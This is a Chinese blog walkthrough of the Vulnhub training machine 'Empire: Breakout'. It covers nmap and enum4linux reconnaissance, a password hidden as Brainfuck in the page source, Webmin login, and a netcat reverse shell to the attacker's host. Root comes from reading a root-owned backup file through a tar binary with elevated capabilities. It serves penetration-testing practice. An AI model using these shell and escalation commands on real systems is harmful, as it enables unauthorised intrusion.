EMPIRE BREAKOUT渗透记录

最新推荐文章于 2024-05-13 11:46:19 发布
最新推荐文章于 2024-05-13 11:46:19 发布
阅读量379 收藏 7
点赞数 9
文章标签: 网络安全 ctf 内网渗透 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/althumi/article/details/135050881
版权 
主机:10.80.56.101
靶机:10.80.56.144

nmap -p- 10.80.56.144

PORT      STATE SERVICE                                                                                                                                                                                            
80/tcp    open  http                                                                                                                                                                                               
139/tcp   open  netbios-ssn                                                                                                                                                                                        
445/tcp   open  microsoft-ds                                                                                                                                                                                       
10000/tcp open  snet-sensor-mgmt                                                                                                                                                                                   
20000/tcp open  dnp 

nmap -sS -sV -A -n 10.80.56.144

PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.51 (Debian)
139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2
10000/tcp open  http        MiniServ 1.981 (Webmin httpd)
|_http-server-header: MiniServ/1.981
|_http-title: 200 — Document follows
20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
|_http-title: 200 — Document follows
|_http-server-header: MiniServ/1.830
MAC Address: 08:00:27:A1:BE:32 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

#存在Samba smbd 4.6.2 Webmin httpd服务,可以使用专有工具爆破一下用户名
enum4linux -a 10.80.56.144

S-1-22-1-1000 Unix User\cyber (Local User)   #用户为cyber

#访问主页发现源码含有brainfuck语言代码,解密获取密码
http://10.80.56.144
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

密码:.2uqPEfj3D<P'a-3
Webmin用户:cyber

#访问Webmin登录页面
https://10.80.56.144:20000/

#获取shell,查看user.txt,获取第一个flag
3mp!r3{You_Manage_To_Break_To_My_Secure_Access}

#主机开启6666端口监听
nc -lvvp 6666
#靶机shell连接主机
nc -e /bin/bash 10.80.56.101 6666

#开启交互式shell
python -c "import pty;pty.spawn('/bin/bash')"
python3 -c "import pty;pty.spawn('/bin/bash')"

#用户目录下特殊文件,getcap查看具有读取任意文件权限
getcap tar
tar cap_dac_read_search=ep

#查看var下有backup和pass关键字,查看权限拥有者为root
/var/backups/.old_pass.bak
#使用特殊文件压缩提取目标文件,解压
./tar -cvf pass.tar /var/backups/.old_pass.bak
tar -xvf pass.tar

#获取root密码
cat .old_pass.bak
Ts&4&YurgtRX(=~h

#提权成功
su

#通关靶机
cat rOOt.txt
3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}

Author: Icex64 & Empire Cybersecurity
althumi
关注
  • 9
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
empire框架2022最新版本
06-28
Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。 Empire实现了无需powshell.exe就可运行Powershell代理的功能,还可以快速在...
Samba漏洞详解
m0_64593235的博客
04-19 393
samba漏洞详解
linux samba 漏洞 exp,smaba漏洞总结
weixin_39816448的博客
05-20 1737
由于我无法确定具体影响的具体版本,所以samba版本在4.6.4之下都视为有漏洞存在。1,Samba任意文件访问漏洞(CNA-2004-0815)漏洞简介Samba是一个开源/免费软件套件,为SMB / CIFS客户提供无缝文件和打印服务。远程利用Samba中的输入验证漏洞允许攻击者访问指定共享路径之外的文件和目录。漏洞利用条件漏洞使用了samba软件套件,通常在445端口或者139端口。影响版本...
vulnhub靶机:Empire: Breakout
最新发布
weixin_69670995的博客
05-13 836
发现它是可以读取任意的文件,但是不知道/root目录下有什么文件,到着没有思路了,查看网上资料在/var/ backups目录下面有一个.old_pass.bak文件,我们使用tar去查看一下这文件里的内容(先将.old_pass.bak文件进行压缩到家目录下,然后解压到家目录下,使用cat命令查看文件)试了很多次,发现不让输入密码,这就很无语,报"Authentication failure"错误,我知道的报这个错误的原因是密码输入错误或者是root没有设置密码,尝试一下反弹shell吧。
靶机练习 No.22 Vulnhub靶机 Breakout samba,webmin,tar提权
YouthBelief的博客
01-24 3827
0x00 环境准备 靶机下载 https://www.vulnhub.com/entry/empire-breakout,751/ 启动方式 VMware 启动 版本信息 Name: Empire: Breakout Date release: 21 Oct 2021 Author: icex64 & Empire Cybersecurity Series: Empire 靶机描述 Difficulty: Easy This box was created to be an E
linux smb 漏洞_Samba远程代码执行漏洞(CVE-2017-7494)
weixin_35241774的博客
12-23 984
我自横刀向天笑 去留肝胆两昆仑原本想复现一下CVE-2017-7494漏洞再分享出来的,没曾想过程一波三折,结果还铩羽而归。诶,还是在此记录一下失败的复现过程吧,为了纪念一下折腾不止的岁月,还有原谅我没有最终复现成功-!-。关于此漏洞的介绍不用多说,可以移步Samba远程代码执行漏洞|Freebuf。Samba远程代码执行漏洞被业内称为linux版的永恒之蓝,危害可想而知。当然相比windows来...
靶机渗透练习11-Tiki
hirak0的博客
04-15 2276
靶机描述 靶机地址:https://www.vulnhub.com/entry/tiki-1,525/ Description Oh no our webserver got compromised. The attacker used an 0day, so we dont know how he got into the admin panel. Investigate that. This is an OSCP Prep Box, its based on a CVE I recently foun
Empire学习笔记.pdf
09-25
Empire是一款强大的、开源的 PowerShell 后渗透测试框架,由 Python 编写,主要用于网络攻防演练、红蓝对抗等安全场景。它允许安全研究人员在Windows、Linux和Mac OS平台上创建自定义的 PowerShell 模块,进行隐蔽的...
Empire知识点梳理
09-25
Empire是一个高级的.NET/C#后渗透框架,主要用于在成功攻破目标系统后进行更深层次的探索与操控。它提供了丰富的功能,包括但不限于创建监听器(Listeners)、管理和控制代理(Agents)、提权(Privilege Escalation...
empire-web:PowerShell Empire Web界面
05-14
运行Empire REST API服务器获取PowerShell Empire: : ./empire --rest --restport <port> --username <empire> --password <empire> 例如: ./empire --rest --restport 1337 --username admin --password 3mpir3...
白蚁网安的渗透工具
04-25
工具如Empire、Cobalt Strike等在这一阶段很常见。 6. **报告与建议**:最后,测试者将整理测试过程中的发现,编写详细报告,并提出修复漏洞和加强安全性的建议。 压缩包中的文件名 "[白蚁网安] - 渗透系统.exe" ...
Samba远程代码执行漏洞(CVE-2017-7494)复现
m0_48520508的博客
01-06 2482
0x00简介 Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源,还能与全世界的电脑分享资源。 0x
Linux网络文件共享服务(三)SAMBA服务
崔庆贺的博客
07-08 2061
成功不易,加倍努力!4 SAMBA服务4.1 SAMBA服务简介4.2 SAMBA软件介绍4.3 SAMBA客户端工具4.3.1 使用smbclient 访问SAMBA服务器4.3.2 挂载CIFS文件系统4.4 管理SAMBA用户4.4.1 实现samba用户说明4.4.2 管理用户命令4.5 SAMBA服务器配置4.5.1 SAMBA服务器全局配置4.5.2 配置特定目录共享4.6 实战案例4.6.1 实战案例:利用SAMBA实现指定目录共享4.6.2 实战案例2:实现不同samba用户访问相同的sam
Samba 远程命令执行漏洞(CVE-2017-7494)
07-29 4197
Samba 远程命令执行漏洞(CVE-2017-7494)
samba漏洞修补——升级 4.15.5版本
fanggeyan的博客
07-19 3212
samba漏洞修补——升级4.15.5版本。
Vulnhub靶机:empire breakout
qq_48904485的博客
01-08 884
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:empire:breakout(10.0.2.11)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/empire-breakout,751/
Vulnhub靶机——EMPIRE: BREAKOUT
流水不争先,争的是滔滔不绝
04-08 981
Vulnhub靶机——EMPIRE: BREAKOUT,tar文件具有可执行权,并且具备跨目录读取任意文件的特殊权限,利用tar文件的打包压缩再解压,实现文件的权限绕过
靶机Empire:Breakout(帝国突围)
m0_67427205的博客
12-18 183
扫描同一网段的ip地址,因为靶机的ip地址我们不知道本靶机首先通过文件共享服务可以使用 enum4linux 枚举信息,在通过主页面进行信息收集,得到相关信息,登录后台getshelll,最后通过可执行文件进行提权使用 enum4linux 枚举信息Brainfuck解密webadmin 后台反弹 shell 提权提权微信搜索公众号关注“东南网络安全
Empire安装与使用教程:搭建Python2环境与反弹shell
在Empire中,通过`help`可以查看目标主机的可用命令,这使得渗透测试者能够执行各种任务,如执行命令、收集信息、在网络中横向移动等,以实现全面的渗透测试目标。在实际操作中,务必确保遵循合法授权和道德规范,仅...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值